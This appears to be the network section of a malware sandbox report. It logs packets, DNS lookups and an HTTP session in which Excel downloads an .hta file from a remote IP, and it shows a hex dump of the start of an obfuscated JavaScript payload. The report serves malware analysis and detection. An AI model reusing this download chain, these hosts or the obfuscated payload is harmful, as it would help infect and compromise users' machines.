Nov 20, 2024 07:50:32.907428980 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.907449007 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.907459974 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.907479048 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.907479048 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.907497883 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.907509089 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.907525063 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.907541037 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.907541037 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.907567024 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.908035994 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908046961 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908066988 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908077955 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908097029 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908107042 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908127069 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908128977 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.908128977 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.908144951 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908154964 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.908155918 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908175945 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908185959 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908230066 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.908230066 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.908783913 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908795118 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908813000 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908910990 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908924103 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.908927917 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908943892 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908957958 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908976078 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908984900 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.908987045 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.908987999 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.909002066 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.909018993 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.909029007 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.909054995 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.909054995 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.909876108 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.909893990 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.909910917 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.909920931 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.909940004 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.909949064 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.909960985 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.909961939 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.909970045 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.909980059 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.909993887 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.909998894 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.910017014 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.910024881 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.910028934 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.910048008 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.910089016 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.910089970 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.910743952 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.910754919 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.910775900 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.910785913 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.910800934 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.910815001 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.910820961 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.910834074 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.910851955 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.910865068 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.910877943 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.910877943 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.910897017 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.912381887 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.912393093 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.912419081 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.912427902 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.912445068 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.912456036 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.912463903 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.912463903 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.912501097 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.912555933 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.915101051 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.915127993 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.915163040 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.915174007 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.915184021 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.915242910 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.915251017 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.915251970 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.915280104 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.915290117 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.915301085 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.915307999 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.915332079 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.915340900 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.915352106 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.915369987 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.915380001 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.915419102 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.915419102 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.943411112 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.943451881 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.943470955 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.943481922 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.943507910 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.943519115 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.943540096 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.943538904 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.943538904 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.943556070 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.943574905 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.943586111 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.943591118 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.943594933 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.943662882 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.999665976 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.999679089 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.999699116 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.999833107 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.999844074 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.999864101 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.999875069 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.999891043 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.999901056 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.999901056 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.999914885 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.999928951 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.999943972 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.999960899 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.999969959 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.999969959 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:32.999977112 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:32.999999046 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000010014 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000032902 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000044107 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000047922 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.000047922 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.000066996 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000077009 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000099897 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000113964 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.000113964 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.000154972 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000168085 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000200987 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.000209093 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000221014 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000226974 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.000260115 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.000260115 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.000344992 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000356913 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000372887 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000395060 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000410080 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.000420094 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000432014 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000458002 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000478029 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000479937 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.000495911 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000514030 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000529051 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000543118 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.000549078 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000559092 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.000571012 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000619888 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.000842094 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000853062 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000874996 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000888109 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000905991 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000916958 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000929117 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.000929117 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.000941038 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000966072 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000977993 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.000998974 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.001009941 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.001012087 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.001012087 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.001034975 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.001054049 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.001066923 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.001085997 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.001096010 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.001102924 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.001102924 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.001120090 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.001137972 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.001159906 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.001174927 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.001178026 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.001178026 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.001195908 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.001214981 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.001224041 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.001270056 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.005800009 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.005810976 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.005831957 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.005834103 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.005850077 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.005857944 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.005860090 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.005867004 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.005872965 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.005875111 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.005878925 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.005891085 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.005896091 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.005901098 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.005912066 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.005913973 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.005945921 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.005949020 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.005970001 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.005981922 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.005990982 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.006002903 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.006011009 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.006012917 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.006019115 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.006038904 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.006050110 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.006073952 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.006083012 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.006088972 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.006088972 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.006103992 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.006114960 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.006128073 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.006140947 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.006156921 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.006156921 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.006160975 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.006182909 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.007563114 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.007574081 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.007596970 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.007616997 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.007623911 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.007627964 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.007649899 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.007659912 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.007678032 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.007694006 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.007694006 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.035746098 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.035784960 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.035794973 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.035835028 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.035835028 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.035842896 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.035854101 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.035872936 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.035893917 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.035903931 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.035911083 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.035923958 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.035933971 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.035949945 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.035970926 CET	80	49167	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:33.035980940 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.035980940 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.036026955 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.225532055 CET	49167	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:33.644664049 CET	49168	80	192.168.2.22	208.95.112.1
Nov 20, 2024 07:50:33.649560928 CET	80	49168	208.95.112.1	192.168.2.22
Nov 20, 2024 07:50:33.649707079 CET	49168	80	192.168.2.22	208.95.112.1
Nov 20, 2024 07:50:33.650850058 CET	49168	80	192.168.2.22	208.95.112.1
Nov 20, 2024 07:50:33.655679941 CET	80	49168	208.95.112.1	192.168.2.22
Nov 20, 2024 07:50:34.125209093 CET	80	49168	208.95.112.1	192.168.2.22
Nov 20, 2024 07:50:34.334578037 CET	80	49168	208.95.112.1	192.168.2.22
Nov 20, 2024 07:50:34.334640026 CET	49168	80	192.168.2.22	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 07:49:57.045480013 CET	54562	53	192.168.2.22	8.8.8.8
Nov 20, 2024 07:49:57.057377100 CET	53	54562	8.8.8.8	192.168.2.22
Nov 20, 2024 07:49:59.261729956 CET	52917	53	192.168.2.22	8.8.8.8
Nov 20, 2024 07:49:59.271543026 CET	53	52917	8.8.8.8	192.168.2.22
Nov 20, 2024 07:50:15.861289978 CET	62751	53	192.168.2.22	8.8.8.8
Nov 20, 2024 07:50:15.873127937 CET	53	62751	8.8.8.8	192.168.2.22
Nov 20, 2024 07:50:15.880088091 CET	57893	53	192.168.2.22	8.8.8.8
Nov 20, 2024 07:50:15.895390987 CET	53	57893	8.8.8.8	192.168.2.22
Nov 20, 2024 07:50:33.616365910 CET	54821	53	192.168.2.22	8.8.8.8
Nov 20, 2024 07:50:33.625648975 CET	53	54821	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 20, 2024 07:49:57.045480013 CET	192.168.2.22	8.8.8.8	0x36b2	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
Nov 20, 2024 07:49:59.261729956 CET	192.168.2.22	8.8.8.8	0x417d	Standard query (0)	provit.uk	A (IP address)	IN (0x0001)	false
Nov 20, 2024 07:50:15.861289978 CET	192.168.2.22	8.8.8.8	0xb9e1	Standard query (0)	1017.filemail.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 07:50:15.880088091 CET	192.168.2.22	8.8.8.8	0xfba5	Standard query (0)	1017.filemail.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 07:50:33.616365910 CET	192.168.2.22	8.8.8.8	0xfe8a	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 20, 2024 07:49:57.057377100 CET	8.8.8.8	192.168.2.22	0x36b2	No error (0)	provit.uk		198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 20, 2024 07:49:59.271543026 CET	8.8.8.8	192.168.2.22	0x417d	No error (0)	provit.uk		198.244.140.41	A (IP address)	IN (0x0001)	false
Nov 20, 2024 07:50:15.873127937 CET	8.8.8.8	192.168.2.22	0xb9e1	No error (0)	1017.filemail.com	ip.1017.filemail.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 20, 2024 07:50:15.873127937 CET	8.8.8.8	192.168.2.22	0xb9e1	No error (0)	ip.1017.filemail.com		142.215.209.78	A (IP address)	IN (0x0001)	false
Nov 20, 2024 07:50:15.895390987 CET	8.8.8.8	192.168.2.22	0xfba5	No error (0)	1017.filemail.com	ip.1017.filemail.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 20, 2024 07:50:15.895390987 CET	8.8.8.8	192.168.2.22	0xfba5	No error (0)	ip.1017.filemail.com		142.215.209.78	A (IP address)	IN (0x0001)	false
Nov 20, 2024 07:50:33.625648975 CET	8.8.8.8	192.168.2.22	0xfe8a	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

provit.uk

1017.filemail.com

192.3.22.13

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49162	192.3.22.13	80	3216	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 07:49:57.983184099 CET	380	OUT	GET /352/seethebestthingswithgreatsituationshandletotheprogress.hta HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.22.13 Connection: Keep-Alive
Nov 20, 2024 07:49:58.566751003 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 06:49:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Tue, 19 Nov 2024 09:34:50 GMT ETag: "2c931-62740beac27e0" Accept-Ranges: bytes Content-Length: 182577 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/hta Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 38 25 32 35 32 32 